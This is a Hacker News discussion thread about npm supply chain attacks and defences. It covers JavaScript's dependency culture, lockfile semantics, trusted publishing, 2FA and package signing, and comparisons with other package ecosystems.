Go uses the hash of the source code, not the commit ID. So there's no difference between vendoring and using the central repo.
npm has always downloaded to the current directory.
That isn't the same as vendor-izing unless you are committing node_modules to your VCS, which would be insane.
The problem with your idea is that you need to find the person who wants to do all this auditing of every version of Node/Python/Ruby libraries.
I believe good centralized infrastructure for this would be a good start. It could be "gamified" and reviewers could earn reputation for reviewing packages, common packages would be reviewed all the time.
Kinda like Stackoverflow for reviews, with optional identification and such.
And honestly an LLM can strap a "probably good" badge on things with cheap batch inference.
Decentralised auditing is what is needed.
> suffer from this problem
Benefit from this feature.
I'm coming to the unfortunate realizattion that supply chain attacks like this are simply baked into the modern JavaScript ecosystem. Vendoring can mitigate your immediate exposure, but does not solve this problem.
These attacks may just be the final push I needed to take server rendering (without js) more seriously. The HTMX folks convinced me that I can get REALLY far without any JavaScript, and my apps will probably be faster and less janky anyway.
Traditional JS is actually among the safest environments ever created. Every day, billions of devices run untrusted JS code, and no other platform has seen sandboxed execution at such scale. And in nearly three decades, there have been very few incidents of large successful attacks on browser engines. That makes the JS engine derived from browsers the perfect tool to build a server side framework out of.
However, processes and practices around NodeJS and npm are in dire need of a security overhaul. leftpad is a cultural problem that needs to be addressed. To start with, snippets don't need to be on npm.
Sandboxing doesn't do any good if the malicious code and target data are in the same sandbox, which is the whole point of these supply-chain attacks.
I think the sandbox they're talking about is the browser, not the server (which runs node).
But if we think about a release publishing chain like a BSD process separation, why do they have to be?
Sure, there will be a step/stage that will require access to NPM publish credentials to publish to NPM. But why does this stage need to execute any code except a very small footprint of vetted code? It should just pickup a packaged, signed binary and move it to NPM.
The compilation/packaging step on the other hand doesn't need publishing rights to NPM. Ideally, it should only get a filesystem with the sources, dependencies and a few shared libraries and /sys or /proc dependencies it may need to function. Why does some dependency downloading need access to your entire filesystem? Maybe it needs some allowed secrets, but eh.
It's certainly a lot of change into existing pipelines and ideas, and it's certainly possible to poke holes into there if you want things to be easy. But it'd raise the bar quite a bit.
I mean, what does do good if your supply chain is attacked?
This said, less potential vendors supplying packages 'may' reduce exposure, but doesn't remove it.
Either way, not running the bleeding edge packages unless it's a known security fix seems like a good idea.
The supply chain infrastructure needs to stop being naive and allowing for insecure publishing.
- npm should require 2FA disallow tokens for publishing. This is an option, but it should be a requirement.
- npm should require using a trusted publisher and provenance for package with over 100k downloads a week and their dependencies.
- Github should require a 2FA step for automated publishing
- npm should add a cool down period where if won't install brand new packages without a flag
- npm should stop running postinstall scripts.
- npm should have an option to not install packages without provenance.
The reality is that for a huge crowd of developers 2FA doesn't do shit.
> Traditional JS is actually among the safest environments ever created.
> However, processes and practices around NodeJS and npm are in dire need of a security overhaul. leftpad is a cultural problem that needs to be addressed. To start with, snippets don't need to be on npm.
Traditional JS is the reason we have all of these problems around NodeJS and npm. It's a lot better than it was, but a lot of JS tooling came up in the time when ES5 and older were the standard, and to call those versions of the language lacking is... charitable. There were tons of things that you simply couldn't count on the language or its standard library to do right, so a culture of hacks and bandaids grew up around it. Browser disparities didn't help either.
Then people said, "Well, why don't we all share these hacks and bandaids so that we don't have to constantly reinvent the wheel?", and that's sort of how npm got its start. And of course, it was the freewheeling days of the late 00s/early 10s, when you were supposed to "move fast and break things" as a developer, so you didn't have time to really check if any of this was secure or made any sense. The business side wanted the feature and they wanted it now.
The ultimate solution would be to stop slapping bandaids and hacks on the JS ecosystem by making a better language but no one's got the resolve to do that.
Python is the other extreme, with an incredibly heavy weight standard library with a built in function to do just about anything.
E.g. there is a built in function that takes elements pairwise from a list! That level of minutia being included feels nuts having come from other languages.
Javascript doesn't have a standard library, until it does the 170 million[1] weekly downloads of packages like UUID will continue. You can't expect people to re-write everything over and over.
That's not the problem. There is a cultural (and partly technical) aversion in JavaScript to large libraries - this is where the issue comes from. So, instead of having something like org.apache.commons in Java or Boost in C++ or Posix in C, larger libraries that curate a bunch of utilities missing from the standard library, you get an uncountable number of small standalone libraries.
I would bet that you'll find a third party `leftpad` implementation in org.apache.commons or in Spring or in some other collection of utils in Java. The difference isn't the need for 3rd party software to fix gaps in the standard library - it's the preference for hundreds of small dependencies instead of one or two larger ones.
Lodash is a good counterpoint, but it’s falling out of style since the JS runtimes support more basic things now.
JS apps, despite the HN narrative, have a much stronger incentive to reduce bundle/“executable” size compared to most other software, because the expectation is for your web app to “download” nearly instantly for every new user. (Compare to nearly any other type of software, client or server, where that’s not an expectation.)
JS comes with exactly zero tools out of the box to make that happen. You have to go out of your way to find a modern toolchain that will properly strip out dead code and create optimized scripts that are as small as possible.
This means the “massive JS library which includes everything” also depends on having a strong toolchain for compiling code. And while may professional web projects have that, the basic script tag approach is still the default and easiest way to get started… and pulling in a massive std library through that is just a bad idea.
This baseline — the web just simply having different requirements around runtime execution — is part of where the culture comes from.
And because the web browser traditionally didn’t include enough of a standard library for making apps, there’s a strong culture of making libraries and frameworks to solve that. Compare to native apps, where there’s always an official sdk or similar for building apps, and libraries like boost are more about specific “lower level” language features (algorithms, concurrency, data structures, etc) and less about building different types of software like full-blown interactive applications and backend services.
There are attempts to solve this (Deno is probably the best example), but buy-in at a professional level requires a huge commitment to migrate and change things, so there’s a lot of momentum working against projects like that.
1000% agree. Javascript is weak in this regard if you compare it to major programming languages. It just adds unnecessary security risks not having a language with built in imports for common things like making API calls out or parsing JSON, for example.
It does have functions for that, “fetch” and “JSON.parse,” available in most JS runtimes.
> You can't expect people to re-write everything over and over.
Call me crazy but I think agentic coding tools may soon make it practical for people to not be bogged down by the tedium of implementing the same basic crap over and over again, without having to resort to third party dependencies.
I have a little pavucontrol replacement I'm walking Claude Code through. It wanted to use pulsectl but, to see what it could do, I told it no. Write your own bindings to libpulse instead. A few minutes later it had that working. It can definitely write crap like leftpad.
FYI, there's crypto.randomUUID()
That's built in to server side and browser.
You have the DOM and Node APIs. Which I think cover more than C library or Common Lisp library. Adding direct dependencies is done by every project. The issue is the sprawling deps tree of NPM and JS culture.
> You can't expect people to re-write everything over and over.
That’s the excuse everyone is giving, then you see thousands of terminal libraries and calendar pickers.
It's a waste of time to strictly vet dependencies on my side when adding the standard test runner by Meta - jest - alone adds 300 packages to my dependency graph.
So yes, the sprawling deps tree and culture is the problem. We would need to start reducing dependencies of the basic tools first. Otherwise it seems rather pointless to bother app developers with reducing dependencies.
When I was learning JS/node/npm as a total programming newbie, a lot of the advice online was basically “if you write your own version of foobar when foobar is already available as an npm package, you’re stupid for wasting your time”.
I’d never worked in any other ecosystem, and I wish I realized that advice was specific to JS culture
It's not really bad advice, it just has different implications in Javascript.
In other languages, you'd have a few dependencies on larger libraries providing related functionality, where the Javascript culture is to use a bunch of tiny libraries to give the same functionality.
Sometimes I wonder how many of these tiny libraries are just the result of an attempt to have something ready for a conference talk and no one had the courage to say "Uh, Chris, that already exists, and the world doesn't need your different approach on it."
None of those security guarantees matter when you take out the sandbox, which is exactly what server-side JS does.
The isolated context is gone and a single instance of code talking to an individual client has access to your entire database. It’s a completely different threat model.
So maybe the solution would be to sandbox Node.js?
I'm not quite sure what that would mean, but if it solves the problem for browsers, why not for server?
You can't sandbox the code that is supposed to talk to your DB from your DB.
And even on client side, the sandboxing helps isolate any malicious webpage, even ones that are accidentally malicious, from other webpages and from the rest of your machine.
If malicious actors could get gmail.com to run their malicious JS on the client side through this type of supply-chain attack, they could very very easily steal all of your emails. The browser sandbox doesn't offer any protection from 1st party javascript.
Deno does exactly that.
But in practice, to do useful things server-side you generally need quite a few permissions.
I think the smallest C library I’ve seen was a single file to include on your project if you want terminal control like curses on windows. A lot of libraries on npm (and cargo) should be gist or a blog post.
Interestingly AI should be able to help a lot with desire to load those snippets.
What I'm wondering if it would help the ecosystem, if you were able to rather load raw snippets into your codebase, and source control as opposed to having them as dependencies.
So e.g. shadcn component pasting approach.
For things like leftPad, cli colors and others you would just load raw typescript code from a source, and there you would immediately notice something malicious or during code reviews.
You would leave actual npm packages to only actual frameworks / larger packages where this doesn't make sense and expect higher scrutiny, multi approvals of releases there.
> I'm coming to the unfortunate realizattion that supply chain attacks like this are simply baked into the modern JavaScript ecosystem.
I see this odd take a lot - the automatic narrowing of the scope of an attack to the single ecosystem it occurred in most recently, without any real technical argument for doing so.
What's especially concerning is I see this take in the security industry: mitigations put in place to target e.g. NPM, but are then completely absent for PyPi or Crates. It's bizarre not only because it leaves those ecosystems wide open, but also because the mitigation measures would be very similar (so it would be a minimal amount of additional effort for a large benefit).
Could you say more about what mitigations you’re thinking of?
I ask because think the directionality is backwards here: I’ve been involved in packaging ecosystem security for the last few years, and I’m generally of the opinion that PyPI has been ahead of the curve on implementing mitigations. Specifically, I think widespread trusted publishing adoption would have made this attack less effective since there would be fewer credentials to steal, but npm only implemented trusted publishing recently[1]. Crates also implemented exactly this kind of self-scoping, self-expiring credential exchange ahead of npm.
(This isn’t to malign any ecosystem; I think people are also overcorrect in treating this like a uniquely JavaScript-shaped problem.)
[1]: https://github.blog/changelog/2025-07-31-npm-trusted-publish...
> PyPI has been ahead of the curve on implementing mitigations
Indeed, crates.io implemented PyPI's trusted publishing and explicitly called out PyPI as their inspiration: https://blog.rust-lang.org/2025/07/11/crates-io-development-...
Most people have addressed the package registry side of NPM.
But NPM has a much, much bigger problem on the client side, that makes many of these mitigations almost moot. And that is that `npm install` will upgrade every single package you depend on to its latest version that matches your declared dependency, and in JS land almost everyone uses lax dependency declarations.
So, an attacker who simply publishes a new patch version of a package they have gained access to will likely poison a good chunk of all of the users of that package in a relatively short amount of time. Even if the projects using this are careful and use `npm ci` instead of `npm install` for their CI builds, it will still easily get developers to download and run the malicious new version.
Most other ecosystems don't have this unsafe-by-default behavior, so deploying a new malicious version of a previously safe package is not such a major risk as it is in NPM.
> in JS land almost everyone uses lax dependency declarations
They do, BUT.
Dependency versioning schemes are much more strictly adhered to within JS land than in other ecosystems. PyPi is a mishmash of PEP 440, SemVer, some packages incorrectly using one in the format of the other, & none of the 3 necessarily adhering to the standard they've chosen. Other ecosystems are even worse.
Also - some ecosystems (PyPi again) are committing far worse offences than lax versioning - versionless dependency declaration. Heavy reliance on requirements.txt without lockfiles where half the time version isn't even specified at all. Astral/Poetry are improving the situation here but things are still bad.
Maven land is full of plugins with automated pom.xml version templating that has effectively the same effect as lax versioning, but without any strict adherence to any kind of standard like semver.
Yes, the situation in JS land isn't great, but there are much worse offenders out there.
The point is still different. In PyPI, if I put `requests` in my requirements.txt, and I run `pip install -r requirements.txt` every time I do `make build`, I will still only get one version of requests - the latest available the first time I installed it. This severely reduces the attack radius compared to NPM's default, where I would get the latest (patch) version of my dependency every day. And the ecosystem being committed to respecting semver is entirely irrelevant to supply chain security. Malicious actors don't care about semver.
Overall, publishing a new malicious version of a package is a much lesser problem in virtually any ecosystem other than NPM; in NPM, it's almost an automatic remote code execution vulnerability for every NPM dev, and a persistent threat for many NPM packages even without this.
> This severely reduces the attack radius compared to NPM's default, where I would get the latest (patch) version of my dependency every day.
By default npm will create a lock file and give you the exact same version every time unless you manually initiate an upgrade. Additionally you could even remove the package-lock.json and do a new npm install and it still wouldn't upgrade the package if it already exists in your node_modules directory.
Only time this would be true is if you manually bump the version to something that is incompatible, or remove both the package-lock.json and your node_modules folder.
Ahh this might explain the behavior I observed when running npm install from a freshly checked out project where it basically ignored the lock file. If I recall in that situation the solution was to run an npm clean install or npm ci and then it would use the lock file.
Generally you have the right of it, but a word of caution for Pythonistas:
> The point is still different. In PyPI, if I put `requests` in my requirements.txt, and I run `pip install -r requirements.txt` every time I do `make build`, I will still only get one version of requests - the latest available the first time I installed it.
Only because your `make build` is a custom process that doesn't use build isolation and relies on manually invoking pip in an existing environment.
Ecosystem standard build tools (including pip itself, using `pip wheel` — which really isn't meant for distribution, but some people seem to use it anyway) default to setting up a new virtual environment to build your code (and also for each transitive dependency that requires building — to make sure that your dependencies' build tools aren't mutually incompatible, or broken by other things in the envrionment). They will read `requests` from `[project.dependencies]` in your pyproject.toml file and dump the latest version in that new environment, unless you use tool-specific configuration (or of course a better specification in pyproject.toml) to prevent that. And if your dependencies were only available as sdists, the build tool would even automatically, recursively attempt to build those, potentially running arbitrary code from the package in the process.
> every time I do `make build`
I'm going to assume this is you running this locally to generate releases, presumably for personal projects?
If you're building your projects in CI you're not pulling in the same version without a lockfile in place.
> Maven land is full of plugins with automated pom.xml version templating that has effectively the same effect as lax versioning, but without any strict adherence to any kind of standard like semver.
Please elaborate on this. I'm a long-time Java developer and have never once seen something akin to what you're describing here. Maven has support for version ranges but in practice it's very rarely used. I can expect a project to build with the exact same dependencies resolved today and in six months or a year from now.
I'm not a Java (nor Kotlin) developer - I've only done a little Java project maintenance & even less Kotlin - I've mainly come at this as a tooling developer for dependency management & vulnerability remediation. But I have seen a LOT of varied maven-managed repos in that line of work (100s) and the approaches are wide - varied.
I know this is possible with custom plugins but I've mainly just seen it using maven wrapper & user properties.
There are things that are potentially possible such as templating pom.xml build files or adjusting dependencies based on user properties (this that what you're suggesting?), but what you're describing is definitely not normal, or best practice in the ecosystem and shouldn't be presented as if it's normal practice.
`npm install` uses a lockfile by default and will not change versions. No, not transitives either. You would have to either manually change `package.json` or call `npm update`.
You'd have to go out of your way to make your project as bad as you're describing.
A lot of people use tools like Dependabot which automates updates to the lockfile.
That's unrelated to this.
As well, both Dependabot and Renovate in isolated environments withour secrets or privileges, need to be manually approved, and have minimum publication ages before recommending a package update to prevent basic supply chain attacks or lockfile corruption from a pinned package version being de-published (up to a 3 day window on NPM).
No, this is just wrong. It might indeed use package-lock.json if it matches your node_modules (so that running `npm install` multiple times won't download new versions). But if you're cloning a repo off of GitHub and running npm install for the first time (which a CI setup might do), it will take the latest deps from package.json and update the package-lock.json - at least this is what I've found many responses online claim. The docs for `npm ci` also suggest that it behaves differently from `npm install` in this exact respect:
> In short, the main differences between using npm install and npm ci are:
> The project must have an existing package-lock.json or npm-shrinkwrap.json.
> If dependencies in the package lock do not match those in package.json, npm ci will exit with an error, instead of updating the package lock.
Well but the docs you cited don't match what you stated. You can delete node_modules and reinstall, it will never update the package-lock.json, you will always end up with the exact same versions as before. The package-lock updating happens when you change version numbers in the package.json file, but that is very much expected! So no, running npm install will not pull in new versions randomly.
The internet disagrees. NPM will gladly ignore and update lock files. There may exist a way to actually respect lock files, but the default mode of operation does not work as you would naively expect.
- NPM Install without modifying the package-lock.json https://www.mikestreety.co.uk/blog/npm-install-without-modif...
- Why does "npm install" rewrite package-lock.json? https://stackoverflow.com/questions/45022048/why-does-npm-in...
- npm - How to actually use package-lock.json for installing based on locked versions? https://stackoverflow.com/questions/47480617/npm-how-to-actu...
1. This guy clearly doesn't know how NPM works. Don't use `--no-save` regularly or you'll be intentionally desyncing your lockfile from reality.
2&3. NPM 5 had a bug almost a decade ago. They literally link to it in both of those pages. Here[^1] is a developer repeating how I've said its supposed to work.
It would have taken you less work to just try this in a terminal than search for those "citations".
[^1]: https://github.com/npm/npm/issues/17979#issuecomment-3327012...
Those stackoverflow posts are ancient and many major npm releases old, so in other words: irrelevant. That blog post is somewhat up to date but also very vague about the circumstances which would update the lockfile. Which certainly isn't that npm install updates dependencies to newer versions within the semver range, because it absolutely does not.
Literally just try it yourself?
The way you describe it working doesn't even pass a basic "common sense" check. Just think about what you're saying: despite having a `package-lock.json`, every developer who works on a project will get every dependency updated every time they clone it and get to work?
The entire point of the lockfile is that installations respect it to keep environments agreed. The only difference with `clean install` is that it removes `node_modules` (no potential cache poisoning) and non-zero exits if there is a conflict between `package.json` and `package-lock.json`.
`install` will only update the lockfile where the lockfile conflicts with the `package.json` to allow you to make changes to that file manually (instead of via `npm` commands).
That's not true. Ci will never take new versions from your lock file.
I agree other repos deserve a good look for potential mitigations as well (PyPI too, has a history of publishing malicious packages).
But don't brush off "special status" of NPM here. It is unique in that JS being language of both front-end and back-end, it is much easier for the crooks to sneak in malware that will end up running in visitor's browser and affect them directly. And that makes it a uniquely more attractive target.
npm in itself isn't special at all, maybe the userbase is but that's irrelevant because the mitigation is pretty easy and 99.9999% effective, works for every package manager and boils down to:
1- thoroughly and fully analyze any dependency tree you plan to include 2- immediately freeze all its versions 3- never update without very good reason or without repeating 1 and 2
in other words: simply be professional, face logical consequences if you aren't. if you think one package manager is "safer" than others because magic reasons odds are you'll find out the hard way sooner or later.
Your item #1 there may be simple, but that's not the same as being easy.
agreed, bad wording. it so happens though that sw development includes many problems and practices that aren't easy and are still part of the job.
Do tell: how many packages are in your dependency graph?
I bet it's hundreds.
Jest alone adds 300 packages.
Consequently I doubt that you in fact "thoroughly and fully" analyzed all your dependencies.
Unless what you're shipping isn't a feature rich app, what you proposed seems entirely unrealistic.
Good luck with nr 1 in the js ecosystem and its 30k dependencies 50 branches deep per package
As an outsider looking in as I don't deal with NPM on a daily basis, the 30k dependencies going 50 branches deep seems to be the real problem here. Code reuse is an admiral goal but this seems absurd. I have no idea if these numbers are correct or exaggerations but from my limited time working with NPM a year or two ago it seems like it's a definite problem.
I'm in the C ecosystem mostly. Is one NPM package the equivalent of one object file? Can NPM packages call internal functions for their dependencies instead of relying so heavily on bringing in so many external ones? I guess it's a problem either way, internal dependencies having bugs vs supply chain attacks like these. Doesn't bringing in so many dependencies lead to a lot of dead code and much larger codebases then necessary?
> Is one NPM package the equivalent of one object file?
No. The closest thing to a package (on almost every language) is an entire library.
> Can NPM packages call internal functions for their dependencies instead of relying so heavily on bringing in so many external ones?
Yes, they can. They just don't do it.
> Doesn't bringing in so many dependencies lead to a lot of dead code and much larger codebases then necessary?
There aren't many unecessary dependencies, because the number of direct dependencies on each package is reasonable (on the order of 10). And you don't get a lot of unecessary code because the point of tiny libraries is to only import what you need.
Dead code is not the problem, instead the JS mentality evolved that way to minimize dead code. The problem is that dead code is actually not that much of an issue, but dependency management is.
there are indeed monster packages but you should ask yourself if you need them at all, because if you really do there is no way around performing nr1. you get the code, you own it. you propagate malware by negligence, you're finished as a sw engineer. simple as that.
personally i keep dependencies at a minimum and are very picky with them, partly because of nr1, but as a general principle. of course if people happily suck in entire trees without supervision just to print ansi colors on the terminal or, as in this case, use fancy aliases for colors then bad things are bound to happen. (tbf tinycolor has one single devDependency, shim-deno-test, which only requires typescript. that should be manageable)
i'll grant you that the js ecosystem is special, partly because the business has traditionally reinforced the notion of it being accessory, superficial and not "serious" development. well, that's just naivety, it is as critical a component as any other. ideally you should even have a security department vetting the dependencies for you.
Which mitigations specifically are in npm but not in crates.io?
As far as I know crates.io has everything that npm has, plus
- strictly immutable versions[1]
- fully automated and no human in the loop perpetual yanking
- no deletions ever
- a public and append only index
Go modules go even further and add automatic checksum verification per default and a cryptographic transparency log.
Contrast this with docker hub for example, where not even npm's basic properties hold.
So, it is more like
docker hub ⊂ npm ⊂ crates.io ⊂ Go modules
[1] Nowadays npm has this arguably too
> Go modules go even further and add automatic checksum verification per default
Cargo lockfiles contain checksums and Cargo has used these for automatic verification since time immemorial, well before Go implemented their current packaging system. In addition, Go doesn't enforce the use of go.sum files, it's just an optional recommendation: https://go.dev/wiki/Modules#should-i-commit-my-gosum-file-as... I'm not aware of any mechanism which would place Go's packaging system at the forefront of mitigation implementations as suggested here.
To clarify (a lot of sibling commenters misinterpreted this too so probably my fault - can't edit my comment now):
I'm not referring to mitigations in public repositories (which you're right, are varied, but that's a separate topic). I'm purely referring to internal mitigations in companies leveraging open-source dependencies in their software products.
These come in many forms, everything from developer education initiatives to hiring commercial SCA vendors, & many other things in between like custom CI automations. Ultimately, while many of these measures are done broadly for all ecosystems when targeting general dependency vulnerabilities (CVEs from accidental bugs), all of the supply-chain-attack motivated initiatives I've seen companies engage in are single-ecosystem. Which seems wasteful.
I mostly agree. But NPM is special, in that the exposure is so much higher. The hypothetical python+htmx web app might have 10s of dependencies (including transitive) whereas your typical Javascript/React will have 1000s. All an attacker needs to do is find one of many packages like TinyColor or Leftpad or whatever and now loads of projects are compromised.
Stuff like Babel, React, Svelte, Axios, Redux, Jest… should be self contained and not depend on anything other than being a peer dependency. They are core technological choices that happens early in the project and is hard or impossible to replace afterwards.
- I feel that you are unlikely to need Babel in 2025, most things it historically transpiled are Baseline Widely Available now (and most of the things it polyfilled weren't actually Babel's but brought in from other dependencies like core-js, which you probably don't need either in 2025). For the rest of the things it still transpiles (pretty much just JSX) there are cheaper/faster transpilers with fewer external dependencies and runtime dependencies (Typescript, esbuild). It should not be hard to replace Babel in your stack: if you've got a complex webpack solution (say from CRA reasons) consider esbuild or similar.
- Axios and Jest have "native" options now (fetch and node --test). fetch is especially nice because it is the same API in the browser and in Node (and Deno and Bun).
- Redux is self-contained.
- React itself is sort of self-contained, it's the massive ecosystem that makes React the most appealing that starts to drive dependency bloat. I can't speak to Svelte.
Yeah, I still don't understand a lot of the architecture choices behind the new compiler, including why the new compiler isn't mostly just a set of eslint suggestions with auto-fixes. I've seen the blog posts trying to explain it, but they don't seem to answer my questions. But then I also haven't done enough direct React work recently enough to have need of or actually tried to use the new compiler, so maybe I am just asking the wrong questions.
Yep, which is part of why it feels real good to delete Jest and switch to `node --test`. I realize for a lot of projects that is easier said than done because Jest isn't just the test harness but the assertions framework (`node:assert/strict` isn't terrible; Chai is still a good low-dependency option for fancier styles of assertions) and mocks/substitutes framework (I'm sure there are options there; I never liked Jest's style of mocks so I don't have a recommendation handy).
(ETA: Also, you may not need much for a mocks library because JS' Proxy meta-object isn't that hard to work with directly.)
> NPM is special, in that the exposure is so much higher.
NPM is special in the same way as Windows is special when it comes to malware: it's a more lucrative target.
However, the issue here is that - unlike Windows - targetting NPM alone does not incur significantly less overhead than targetting software registries more broadly. The trade-off between focusing purely on NPM & covering a lot of popular languages isn't high, & imo isn't a worthwhile trade-off.
Well, your typical Rust project has over 1000 dependencies, too. Zed has over 2000 in release mode.
Not saying this in defence of Rust or Cargo, but often times those dependencies are just different versions of the same thing. In a project at one of my previous companies, a colleague noticed we had LOADS of `regex` crate versions. Forgot the number but it was well over 100
That doesn't make sense. The most it could be is 3: regex 0.1.x, regex 0.2.y and regex 1.a.b. You can't have more because Cargo unifies on semver compatible versions and regex only has 3 semver incompatible releases. Plus, regex 1.0 has been out for eons. Pretty much everyone has moved off of 0.1 and 0.2.
The reason he went down this rabbit hole was because he was chronically running low on disk space, and his target dir was one of the largest contributors.
Not sure how he actually got the number; this was just a frustrated Slack message like 4 years ago
A sibling comment mentions we could have been using Cargo workspaces wrong... So, maybe?
He probably just needed to run `cargo clean` occasionally.
But you definitely aren't finding hundreds of versions of `regex` in the same dependency tree.
That seems like a failure in workspace management. The most duplicates I've seen was 3, with crates like url or uuid, even in projects with 1000+ distinct deps.
Your typical Rust project does not have over 1000 dependencies.
Zed is not a typical Rust project; it's a full fledged editor that includes a significant array of features and its own homegrown UI framework.
> Zed is not a typical Rust project; it's a full fledged editor
Funny that text editor is being presented here as some kind of behemoth, not representative of typical software written in Rust. I guess typical would be 1234th JSON serialization library.
One famous example is ripgrep (https://github.com/BurntSushi/ripgrep). Its Cargo.lock (which contains all direct and indirect dependencies) lists 65 dependencies (it has 66 entries, but one of them is for itself).
Also, that lock file includes development dependencies and dependencies for opt-in features like PCRE2. A normal `cargo build` will use quite a bit fewer than 65 dependencies.
I would actually say ripgrep is not especially typical here. I put a lot of energy into keeping my dependency tree slim. Many Rust applications have hundreds of dependencies.
We aren't quite at thousands of dependencies yet though.
> I would actually say ripgrep is not especially typical here. I put a lot of energy into keeping my dependency tree slim. Many Rust applications have hundreds of dependencies.
Thank you for your honesty, and like you and I said, you put a lot of energy into keeping the dependency tree slim. This is not as common as one would like to believe.
I agree it's not common. But neither are Rust applications with 1000+ dependencies. I don't think I've ever compiled a Rust project with over 1,000 dependencies.
Hundreds? Yes, absolutely. That's common.
Maybe I am just unlucky enough to always running into Rust projects that pull in over 1000 dependencies. :D
In retrospect, I should have kept a list of these projects. I probably have not deleted these directories though, so I probably still could make a list of some of these projects.
Not quite. He is a better developer than most who happen to minimize dependencies, but according to my experiences it is not as common as you would like to believe. Do I really need to make a list of all the Rust projects I have compiled that pulled in over 1000 dependencies? If I need to do it to convince you, I will do so, as my time allows.
Most of the biggest repositories already cooperate through the OpenSSF[0]. Last time I was involved in it, there were representatives from npm, PyPI, Maven Central, Crates and RubyGems. There's also been funding through OpenSSF's Alpha-Omega program for a bunch of work across multiple ecosystems[1], including repos.
The Rust folks are in denial about this
Until you go get malware
Supply chain attacks happen at every layer where there is package management or a vector onto the machine or into the code.
What NPM should do if they really give a shit is start requiring 2FA to publish. Require a scan prior to publish. Sign the package with hard keys and signature. Verify all packages installed match signatures. Semver matching isn’t enough. CRC checks aren’t enough. This has to be baked into packages and package management.
> Until you go get malware
While technically true, I have yet to see Go projects importing thousands of dependencies. They may certainly exist, but are absolutely not the rule. JS projects, however...
We have to realize, that while supply chain attacks can happen everywhere, the best mitigations are development culture and solid standard library - looking at you, cargo.
I am a JS developer by trade and I think that this ecosystem is doomed. I absolutely avoid even installing node on my private machine.
Here's an example off the top of my mind:
I think you are reading that wrong, go.sum isn't a list of dependencies it's a list of checksums for modules that were, at some point, used by this module. All those different versions of the same module listed there, they aren't all dependencies, at most one of them is.
Assuming 'go mod tidy' is periodically run go.mod should contain all dependencies (which in this case seems to be shy of 300, still a lot).
Half of go.sum dependencies generally are multiple versions of same package. 400 still a lot, but a huge project like gitea might need them I guess.
> cat go.sum |awk '{print $1}' | sort |uniq |wc -l
431
> wc -l go.sum
1156 go.sum
Sign the package with hard keys and signature.
That's really the core issue. Developer-signed packages (npm's current attack model is "Eve doing a man-in-the-middle attack between npm and you," which is not exactly the most common threat here) and a transparent key registry should be minimal kit for any package manager, even though all, or at least practically all, the ecosystems are bereft of that. Hardening API surfaces with additional MFA isn't enough; you have to divorce "API authentication" from "cryptographic authentication" so that compromising one doesn't affect the other.
How are users supposed to build and maintain a trust store?
In a hypothetical scenario where npm supports signed packages, let's say the user is in the middle of installing the latest signed left-pad. Suddenly, npm prints a warning that says the identity used to sign the package is not in the user's local database of trusted identities.
What exactly is the user supposed to do in response to this warning?
This is a solved problem. https://en.wikipedia.org/wiki/Web_of_trust
Imagine a hobbyist developer with a ~ $0 budget trying to publish their first package. How many thousands of km/miles are you expecting them to travel so they can get enough vouches for their package to be useful for even a single person?
Now imagine you're another developer who needs to install a specific NPM package published by someone overseas who has zero vouches by anyone in your web of trust. What exactly are you going to do?
In reality, forcing package publishers to sign packages would achieve absolutely nothing. 99.99 % of package consumers would not even bother to even begin building a web of trust, and just blindly trust any signature.
The remaining 0.01 % who actually try are either going to fail to gain any meaningful access to a WoT, or they're going to learn that most identities of package publishers are completely unreachable via any WoT whatsoever.
> What NPM should do if they really give a shit is start requiring 2FA to publish.
How does 2FA prevent malware? Anyone can get a phone number to receive a text or add an authenticator to their phone.
I would argue a subscrption model for 1 EUR/month would be better. The money received could pay for certification of packages and the credit card on file can leverage the security of the payments system.
How will multi-factor-authentication prevent such a supply chain issue?
That is, if some attacker create some dummy trivial but convenient package and 2 years latter half the package hub depends on it somehow, the attacker will just use its legit credential to pown everyone and its dog. This is not even about stilling credentials. It’s a cultural issue with bare blind trust to use blank check without even any expiry date.
That's an entirely different issue compared to what we're seeing here. If an attacker rug-pulls of course there is nothing that can be done about that other than security scanning. Arguably some kind of package security scanning is a core-service that a lot of organisations would not think twice about paying npm for.
> If an attacker rug-pulls of course there is nothing that can be done about that other than security scanning.
As another subthread mentioned (https://news.ycombinator.com/item?id=45261303), there is something which can be done: auditing of new packages or versions, by a third party, before they're used. Even doing a simple diff between the previous version and the current version before running anything within the package would already help.
If NPM really cared, they'd stop recommending people use their poorly designed version control system that relies on late-fetching third-party components required by the build step, and they'd advise people to pick a reliable and robust VCS like Git for tracking/storing/retrieving source code objects and stick to that. This will never happen.
NPM has also been sending out nag emails for the last 2+ years about 2FA. If anything, that constituted an assist in the attack on the Junon account that we saw a couple weeks ago.
NPM lock files seem to include hashes for integrity checking, so as long as you check the lock file into the VCS, what's the difference?
Wrong question; NPM isn't bedrock. The question to be answered if there is no difference is, "In that case, why bother with NPM?"
NPM does require 2FA to publish. I would love a workaround! Isn't it funny that even here on HN, misinformation is constantly being spread?
NPM does not require two-factor authentication. If two-factor authentication is enabled for your account and you wish to disable it, this explains how to do that if allowed by your organization:
<https://docs.npmjs.com/configuring-two-factor-authentication...>
It doesn't require 2FA in general, but it does for people with publish rights for popular packages, which covers most or all of the recent security incidents.
https://github.blog/changelog/2022-11-01-high-impact-package...
> The malware includes a self-propagation mechanism through the NpmModule.updatePackage function. This function queries the NPM registry API to fetch up to 20 packages owned by the maintainer, then force-publishes patches to these packages.
npm offers 2FA but it doesn't really advertise that it has a phishing-resistant 2FA (security keys, aka passkeys, aka WebAuthn) available and just happily lets you go ahead and use a very phishable OTP if you want. I place much of the blame for publishers getting phished on npm.
They are. Any language that depends heavily on package managers and lacks a standard lib is vulnerable to this.
At some point people need to realize and go back to writing vanilla js, which will be very hard.
The rust ecosystem is also the same. Too much dependence on packages.
An example of doing it right is golang.
The solution is not to go back to vanilla JS, it's for people to form a foundation and build a more complete utilities library for JS that doesn't have 1000 different dependencies, and can be trusted. Something like Boost for C++, or Apache Commons for Java.
> Something like Boost for C++, or Apache Commons for Java.
Honestly I wish Python worked this way too. The reason people use Requests so much is because urllib is so painful. Changes to a first-party standard library have to be very conservative, which ends up leaving stuff in place that nobody wants to use any more because they have higher standards now. It'd be better to keep the standard library to a minimum needed more or less just to make the REPL work, and have all of that be "builtin" the way that `sys` is; then have the rest available from the developers (including a default "full-fat" distribution), but in a few separately-obtainable pieces and independently versioned from the interpreter.
And possibly maintained by a third party like Boost, yeah. I don't know how important that is or isn't.
Python and Rust both have decent std lib, but it is just a matter of time before this happens in thoae ecosystems. There is nothing unique about this specific attack that could only happen in JavaScript.
>and go back to writing vanilla js
Lists of things that won't happen. Companies are filled with node_modules importers these days.
